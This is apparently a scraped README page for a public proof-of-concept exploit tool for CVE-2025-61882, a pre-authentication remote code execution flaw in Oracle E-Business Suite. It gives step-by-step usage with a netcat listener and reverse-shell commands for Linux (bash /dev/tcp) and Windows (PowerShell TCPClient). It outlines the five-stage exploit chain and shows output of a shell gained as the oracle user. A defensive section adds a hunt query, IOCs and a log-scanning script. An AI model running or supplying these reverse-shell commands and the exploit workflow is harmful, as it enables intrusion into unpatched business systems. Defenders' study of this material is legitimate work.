CVE-2025-61882 PoC — Oracle E-Business Suite Security Vulnerability

Source
Associated Vulnerability
Title: Oracle E-Business Suite Security Vulnerability (CVE-2025-61882)
Description: Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Description
POC of CVE-2025-61882 
Readme
# CVE-2025-61882 Security Testing Tool

![CVSS](https://img.shields.io/badge/CVSS-9.8%20Critical-red)
![Status](https://img.shields.io/badge/Status-Actively%20Exploited-red)
![Platform](https://img.shields.io/badge/Platform-Oracle%20EBS-blue)
![License](https://img.shields.io/badge/License-Educational%20Use-yellow)

## 🚨 CRITICAL LEGAL WARNING

See our [blog post](https://blog.intelligencex.org/cve-2025-61882-oracle-zero-day-exploit-analysis) for technical details

**THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY**

```
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨   ║
║                                                              ║
║  By using this tool, you acknowledge and agree that:        ║
║                                                              ║
║  ✓ You have WRITTEN AUTHORIZATION to test the target        ║
║  ✓ You accept FULL LEGAL RESPONSIBILITY for your actions    ║
║  ✓ You will COMPLY with all applicable laws                 ║
║  ✓ Unauthorized use may result in IMPRISONMENT              ║
║                                                              ║
║  If you DO NOT have authorization: EXIT NOW                 ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝
```

**Penalties for unauthorized use include:**
- Criminal prosecution under CFAA (US), Computer Misuse Act (UK), and equivalent laws
- Civil lawsuits for damages
- Substantial fines (up to $250,000+ in the US)
- Imprisonment (up to 10+ years depending on jurisdiction)
- Permanent criminal record

---

## 📋 Overview

Security testing tool for **CVE-2025-61882**, a critical pre-authentication remote code execution vulnerability affecting Oracle E-Business Suite.

**Created by:** Mindflare  
**Purpose:** Authorized security testing and vulnerability validation  
**Blog:** [Read the full technical analysis](#)

### Vulnerability Details

- **CVE ID:** CVE-2025-61882
- **CVSS Score:** 9.8 (Critical)
- **Attack Vector:** Network (Unauthenticated)
- **Attack Complexity:** Medium
- **Privileges Required:** None
- **User Interaction:** None
- **Affected Versions:** Oracle E-Business Suite 12.2.3 - 12.2.14
- **Patch Status:** Emergency patch released October 4, 2025
- **Exploitation Status:** ⚠️ **ACTIVELY EXPLOITED** by Cl0p ransomware since August 2025

### Technical Summary

CVE-2025-61882 is a sophisticated exploit chain combining five distinct vulnerabilities:

1. **SSRF** - Server-Side Request Forgery via `/OA_HTML/configurator/UiServlet`
2. **CRLF Injection** - HTTP header injection in `return_url` parameter
3. **HTTP Smuggling** - Keep-alive connection abuse to reach internal services (port 7201)
4. **Authentication Bypass** - Path traversal via `/OA_HTML/help/../` prefix
5. **XSLT Injection** - Malicious XSL template processing leads to RCE

---

## 🎯 Intended Use Cases

### ✅ Acceptable Use

- Authorized penetration testing with written permission
- Security research on systems you own
- Vulnerability validation in controlled lab environments
- Red team exercises with proper scope documentation
- Academic research with institutional approval
- Incident response and forensic analysis

### ❌ Prohibited Use

- Any unauthorized system access
- Testing systems without explicit written permission
- Malicious activities or causing harm
- Attacking production systems without approval
- Use for criminal purposes
- Any activity violating applicable laws

---

## 📦 Installation

### Prerequisites

- Python 3.7 or higher
- pip package manager
- Network connectivity to target (authorized only)
- Netcat or a similar listener to receive the reverse shell

### Setup

```bash
# Clone the repository
git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Install dependencies
pip3 install -r requirements.txt

# Make script executable (Linux/Mac)
chmod +x cve-2025-61882-detector.py
```

---

## 🚀 Usage

### Step 1: Set Up Your Listener

In a **separate terminal**, start a netcat listener:

```bash
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444
```

### Step 2: Run the Tool

**Basic Usage (Linux Target):**

```bash
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux
```

**Windows Target:**

```bash
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows
```

### Parameters

| Parameter | Description | Required | Example |
|-----------|-------------|----------|---------|
| `--target` | Target Oracle EBS URL | **Yes** | `http://192.168.1.22:8000` |
| `--lhost` | Your IP address (for callbacks) | **Yes** | `192.168.1.10` |
| `--lport` | HTTP server port (serves XSL payload) | **Yes** | `80` or `8080` |
| `--command` | Command to execute on target | **Yes** | See examples above |
| `--platform` | Target OS: `linux` or `windows` | **Yes** | `linux` |

---

## 📊 Example Output

### Tool Output

```
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully
```

### Netcat Listener Output (If Vulnerable)

```bash
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$
```

---

## 🛡️ Detection & Defense

### For Security Defenders

#### Immediate Actions

1. **Apply Oracle Emergency Patch** (Document ID: 30061882.1)
2. **Hunt for Compromise:**
   ```sql
   SELECT * FROM XDO_TEMPLATES_B 
   WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
   ```
3. **Review Access Logs** since August 2025
4. **Block outbound internet access** from EBS servers

#### Detection Indicators

**Network IOCs:**
```
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secondary)
```

**HTTP Patterns:**
- `POST /OA_HTML/configurator/UiServlet`
- `POST /OA_HTML/SyncServlet`
- `GET /OA_HTML/help/../*.jsp`
- CRLF characters in parameters
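
The request patterns listed above can be swept for in web-tier access logs when reviewing traffic since August 2025. The script below is an added example, not part of the original README or the tool. It assumes Apache/OHS common or combined log format; the rule names, the sample lines and the `/OA_HTML/example` path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed log layout: Apache/OHS common or combined format (adjust LINE_RE otherwise).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3})')

# (rule name, HTTP method, decoded-path regex) taken from the "HTTP Patterns" list.
PATH_RULES = [
    ("uiservlet_post", "POST", re.compile(r"^/OA_HTML/configurator/UiServlet", re.I)),
    ("syncservlet_post", "POST", re.compile(r"^/OA_HTML/SyncServlet", re.I)),
    ("help_traversal", "GET", re.compile(r"^/OA_HTML/help/\.\./", re.I)),
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %250d%250a is caught as well as %0d%0a."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def scan_line(line):
    """Return (client, timestamp, uri, status, [rule names]) or None if no rule hits."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, ts, method, uri, status = m.groups()
    path, _, query = uri.partition("?")
    hits = [name for name, meth, rx in PATH_RULES
            if method == meth and rx.search(fully_decode(path))]
    if re.search(r"[\r\n]", fully_decode(query)):
        hits.append("crlf_in_parameter")
    return (client, ts, uri, int(status), hits) if hits else None

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Oct/2025:10:01:11 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Oct/2025:10:01:12 +0000] "GET /OA_HTML/help/%2e%2e/example.jsp HTTP/1.1" 200 90',
    '203.0.113.9 - - [02/Oct/2025:10:02:00 +0000] "GET /OA_HTML/example?x=a%0d%0aHost:b HTTP/1.1" 302 0',
    '192.0.2.15 - - [02/Oct/2025:10:03:00 +0000] "GET /OA_HTML/help/index.jsp HTTP/1.1" 200 1024',
    '192.0.2.15 - - [02/Oct/2025:10:04:00 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 33',
]

if __name__ == "__main__":
    for client, ts, uri, status, rules in scan(SAMPLE_LOG):
        print(f"{ts} {client} {status} {','.join(rules)} {uri}")
```

A hit is a lead to triage against source address, timing and the `XDO_TEMPLATES_B` query, not proof of compromise. The CRLF check only sees the query string, because standard access logs do not record POST bodies.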

---

## 📚 References

- [Oracle Security Alert Advisory](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html)
- [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- [Google/Mandiant Analysis](https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation)
- [watchTowr Labs Research](https://labs.watchtowr.com/)

---

## 📜 License

MIT License with Educational Use Restrictions - See [LICENSE](LICENSE)

**DISCLAIMER:** This software is for authorized security testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse.

---

## 🔐 Final Warning

```
╔══════════════════════════════════════════════════════════════╗
║           WITH GREAT POWER COMES GREAT RESPONSIBILITY        ║
║                                                              ║
║        🔒 Stay Legal. Stay Ethical. Stay Professional. 🔒   ║
╚══════════════════════════════════════════════════════════════╝
```

**Created by:** Mindflare | **Last Updated:** October 2025

File Snapshot

```
[4.0K] /data/pocs/b44c677f98bbc893a9ac05d86ba357970a963179
├── [ 14K] cve-2025-61882-detector.py
├── [2.5K] LICENSE
├── [8.3K] README.md
└── [  32] requirements.txt

1 directory, 4 files
```